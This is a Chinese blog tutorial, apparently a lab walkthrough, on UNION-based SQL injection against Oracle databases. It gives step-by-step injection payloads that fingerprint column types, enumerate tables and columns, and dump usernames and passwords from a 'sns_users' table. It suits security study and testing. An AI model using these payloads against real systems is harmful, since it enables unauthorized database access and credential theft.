Oracle注入联合查询

最新推荐文章于 2022-03-23 17:11:01 发布
最新推荐文章于 2022-03-23 17:11:01 发布
阅读量762 收藏 2
点赞数
分类专栏: 网络安全 SQL注入 渗透测试 文章标签: 数据库 web安全 渗透测试 oracle
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/song123sh/article/details/123316894
版权
渗透测试 同时被 3 个专栏收录
55 篇文章 13 订阅
订阅专栏
网络安全
46 篇文章 25 订阅
订阅专栏
SQL注入
22 篇文章 1 订阅
订阅专栏

文章目录


oracle,大型数据库,脚本语言一般是jsp,oracle对应端口1521

oracle自带虚拟表dual,oracle的查询语句必须完整的包含from字句,且每个字段的类型都要准确对应,一般使用null来判断类型

默认用户sys和system,最高权限是dba

0、系统语句

通过字段名找到对应表:
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE ‘%PASS%’;

查询第N行:
SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; — 查询第9行(从1开始数)

当前用户:
SELECT user FROM dual;

列出所有用户:
SELECT username FROM all_users ORDER BY username;

列出数据库
SELECT DISTINCT owner FROM all_tables;

列出表名:
SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;

列出字段名:
SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’;
SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and owner = ‘foo’;

定位DB文件:
SELECT name FROM V$DATAFILE;

image-20211018104507327

1、order by 定字段

image-20211018104833951

2、判断字符类型

and 1=2 union select null,null..... from dual 然后一个一个去判断字段类型,方法如下
and 1=2 union select 'null',null...... from dual 返回正常,说明第一个字段是字符型,反之为数字型
第一个字段是字符型时,判断第二个字段类型:
and 1=2 union select 'null','null'...... from dual 返回正常,说明第二个字段是字符型,反之为数字型
第一个字段是数字型时,判断第二个字段类型:
and 1=2 union select null,'null'...... from dual 返回正常,说明第二个字段是字符型,反之为数字型
  判断第n个字段的类型,依次类推即可

image-20211018105146874

两个字段都是字符型

3、判断回显位

image-20211018105604903

4、准备工作

当前用户权限

and 1=2 union select null,(select sys_context('userenv','current_user')from dual) from dual

获取当前数据库名称

and 1=2 union select null,(select instance_name from V$INSTANCE) from dual

获取当前数据库版本

and 1=2 union select null,(select sys.v_$version where rownum=1) from dual

rownum:每次只能显示一条数据

5、爆表

爆当前数据库中的第一个表:
and 1=2 union select '1',(select table_name from user_tables where rownum=1) from dual

爆当前数据库中的第二个表:
and 1=2 union select '1',(select table_name from user_tables where rownum=1 and table_name not in ('第一个表')) from dual
以此类推去爆第n个表

我们需要的是用户的账号密码,因此直接查找存在users字样的表名

and 1=2 union select (select table_name from all_tables where rownum=1 and table_name like '%user%'),'2'from dual

image-20211018110611857

6、从表中获取列名

爆某表中的第一个字段:
and 1=2 union select '1',(select column_name from user_tab_columns where rownum=1 and table_name='表名') from dual

爆某表中的第二个字段:
and 1=2 union select '1',(select column_name from user_tab_columns where rownum=1 and table_name='表名' and column_name not in ('第一个字段')) from dual

爆其它字段以此类推

?id=-1 union select (select column_name from all_tab_columns where rownum=1 and table_name = 'sns_users'),'2'from dual

image-20211018110859818

?id=-1 union select (select column_name from all_tab_columns where rownum=1 and table_name='sns_users' and column_name not in ('USER_NAME')),'2'from dual

image-20211018111256208

7、获取数据

?id=-1 union select user_name,user_pwd from "sns_users"

image-20211018111559407

得到用户名密码不正确

?id=-1 union select user_name,user_pwd from "sns_users" where USER_NAME<>'hu'

得到第二组用户名和密码

image-20211018111623626

登陆后拿到key

Shadow丶S
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL注入联合查询
m0_56578216的博客
08-22 905
适用数据库中的内容会回显到页面中来的情况。联合查询就是利用union select 语句,该语句会同时执行两条select 语句,实现跨库、跨表查询。两条select 语句查询结果具有相同列数:对应的列数据类型相同(特殊情况下,条件被放松)。联合查询就是利用SQL语句中的union select语句同时执行两条select语句,实现跨表查询的方法。由于联合查询会将数据库中的两张表按照列数拼接(纵向拼接)后再进行查询,所以要求两条select语句查询的表必须******
Oracle注入(基础篇)
最新发布
zkaqlaoniao的博客
11-03 823
上面我们已经知道了是4个字段,然后就可以先写上4个null进行占位union select null,null,null,null from dual,然后逐个替换数据的类型进行测试,常见的数据类型其实就那么几个(数值,字符串,时间)在Oracle中有一个比较特殊的存在,它就是rownum,它是一个伪列,它并不存储在任何表中,而是在当我们执行了查询语句之后,它就会出现,对查出来的数据进行编号,将它做为一个判断规则时,它是不支持用>号的,只能是=1或者
Oracle注入
weixin_48141183的博客
11-03 6794
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 近日学习了Oracle注入,写这篇文章主要当作自己的笔记,也希望能成为大家的参考。 一、Oracle的获取数据的基本技巧 1.特殊表 • dual表 ◆ 是一个虚拟的表,用来构成select的语法规则,oracle保证dual里面永远只有一条记录。 • user_tables表 ◆ 该表的ta.
oracle数据库注入联合查询基本语句
bwt_D的博客
11-12 648
oracle对列的类型比较严谨,所以要用null,可以匹配任意类型 oracle中的dual表是一个单行单列的虚拟表 Dual是Oracle中的一个实际存在的表,任何用户均可读取 Oracle版本信息:union select null,(select banner from sys.v_$version where rownum=1),null from dual – 当前用户权限: (select *from session_roles) 当前数据库版本:(select banner from sys
Oracle注入——报错注入
weixin_46601374的博客
02-28 1421
1、什么是Oracle数据库? Oracle 数据库系统,是美国ORACLE公司(甲骨文)提供的以分布式数据库为核心的一组软件产品。Oracle数据库也是一种关系数据库,此数据库体量较大,一般与jsp网站联合 2、Oracle 系统表 Oracle中内置了大量的系统表(有点类似MySQL中的information_schema数据库),根据不同的权限可读取不同的系统表。可通过读取这些系统表获取我们想要的数据(用户信息、表、字段、数据库信息等) DBA、ALL、USER、V_$、GV_$、SESS
oracle 注入靶场,pick靶场-sql注入
weixin_31448735的博客
04-16 728
甲.数字型注入数字型注入一般提交值没有引号,所以直接在后面构造语句就可以了。抓包查看构造语句提交后该数据库表内容被爆出来了。乙.字符型注入首先我们要知道一点,字符串在数据库中提交是需要用引号将字符串包含的。所以字符型注入一般需要用到引号来闭合字符串,闭合引号后就可以接执行的sql语句,就可以执行。name='kobe'这时候需要构造语句 'or 1=1# 单引号是为了闭合1前面的单引号,#是为了...
Oracle数据库注入
weixin_50464560的博客
08-06 1540
0x01 前言 在渗透测试过程中,总是遇到不熟悉的数据库,知道了有SQL注入漏洞但是无法利用,这总让我很苦恼。因为网上的文章很多都是基于Mysql数据库的,当遇到Oracle数据库时有些数据库层面的不同点对于我们测试总会有点困扰,无法成功利用。故学习了Oracle数据库注入的相关知识,在此总结分享给大家,希望能够对安全从业人员有所帮助。 全文基于对于SQL注入具有一定理解,并且能够在Mysql数据库进行注入的基础上进行阐述。本文旨在讲述Oracle数据库多种情况下如何进行注...
oracle手动注入
kfjrlgagkogkhpa的博客
03-23 2148
1、首先判断是否存在注入点 and 1=1/and 1=2 2、然后在判断是什么类型数据库and (select count () from dual)>0** Ps:Dual为oracle的一个默认表 eg:http://xxx.xx.xx.xx:xxxx/new_list.php?id=1 and (select count () from dual)>0,正常则表示为Oracle数据库 3、判断列数order by 看页面是否正常显示 4、联合注入, union select null,n
oracle php 注入,Oracle手工注入小结
weixin_33595380的博客
03-26 248
前言:明日复明日,明日何其多。既然这么多,不妨再拖拖。Mysql和Mssql的注入环境都有了,手注也简单过了一遍,Oracle手注肯定也不能缺席鸭~环境搭建:Oracle相关操作(建立数据表):sqlplus / as sysdbacreate tablespace pentest datafile 'E:\app\tester_sws\oradata\orcl\pentest.dbf' size...
jsp+oracle注入中国联通.docx
02-29
8. **SQL联合查询**:利用`UNION`操作符将合法查询与恶意查询合并,以获取额外的信息。文中逐步构造SQL语句,揭示了数据库的版本、用户名、操作系统等敏感信息。 9. **SYS_CONTEXT函数**:在Oracle中,`SYS_CONTEXT...
Oracle查询优化改写 技巧与案例
10-23
Oracle查询优化改写是数据库管理中的重要技能,尤其是在大型企业级应用中,高效的数据查询能够显著提升系统的响应速度,减少资源消耗,进而提高整体的业务性能。本篇将围绕Oracle查询优化改写的技巧与实际案例进行...
Oracle公交车查询系统
12-02
Oracle公交车查询系统】是一个基于Oracle数据库技术设计的公交线路查询平台,旨在为用户提供便捷、高效的城市公共交通查询服务。系统支持按照时间与站点进行查询,同时也具备向数据库中添加新数据的功能,以满足...
一个关于基于ssm,mysql(也含oracle方式)实现的分页查询.rar
07-26
这个压缩包文件“一个关于基于ssm,mysql(也含oracle方式)实现的分页查询.rar”主要涉及到如何在SSM环境下,使用MySQL和Oracle数据库进行分页查询的实践案例。 首先,Spring作为核心容器,负责管理对象的生命周期...
oracle的开发技术
10-02
9. **递归查询**:使用递归WITH子句,Oracle可以处理复杂的递归关系,如图论中的遍历问题,或在多层关联数据中查找特定路径。 10. **动态SQL**:在Oracle中,可以通过EXECUTE IMMEDIATE语句执行动态构建的SQL语句,...
【计算机网络】IP地址详解
热门推荐
一个普普通通的博客
02-24 4万+
文章目录· IP地址详解一.简单局域网二.IP地址三.子网掩码局域网通信规则:IP地址构成:子网掩码:子网掩码如何确认网络位:四.IP地址详解IP地址详细解剖:案例1:案例2:补充:127开头五.网关六.DNS**DNS:Domain Name Service域名服务器**使用cmd命令---nslookup + 网址 可查询该网址的IP地址示例可使用该IP地址访问百度七.配置IP(以Windows xp为例,其他所有系统同样)1)右键网上邻居---属性--右键本地连接---属性2)双击Internet协
ACL原理及配置
一个普普通通的博客
01-24 2万+
ACL原理及配置 ACL概述 ACL组成 规则编号(Rule ID) 通配符(Wildcard) ACL的分类与标识 基本ACL&高级ACL ACL的匹配机制 ACL的匹配顺序及匹配结果 ACL的匹配位置 ACL的基础配置命令
域——windows服务器域详解
一个普普通通的博客
07-16 1万+
文章目录·域**1.Domain**2.内网环境:3.域的特点:4.域的组成:5.域的部署:6.活动目录7.组策略GPO(Group Policy)8.部署安装活动目录:9.PC加入域:10.常见小问题11)OU:组织单位(Organizational Unit)OU管理12)组策略:Group Policy = GPO1、新建组策略2、编辑组策略 ·域 1.Domain 2.内网环境: 1)工作组:默认模式,人人平等,不方便管理 2)域:人人不平等,集中管理,同一管理 3.域的特点: 集中/统一管理 4.
文件上传之IIS6.0解析漏洞
一个普普通通的博客
03-15 4296
iis6.0解析漏洞
SSH框架整合Oracle实践与教程
"SSH框架和Oracle的...这些内容构成了SSH框架和Oracle数据库联合操作的基础,对于Java Web开发者来说,理解和掌握这些知识点对于高效开发和维护项目至关重要。通过实际编码和练习,可以进一步提升在这些领域的技能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shadow丶S

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值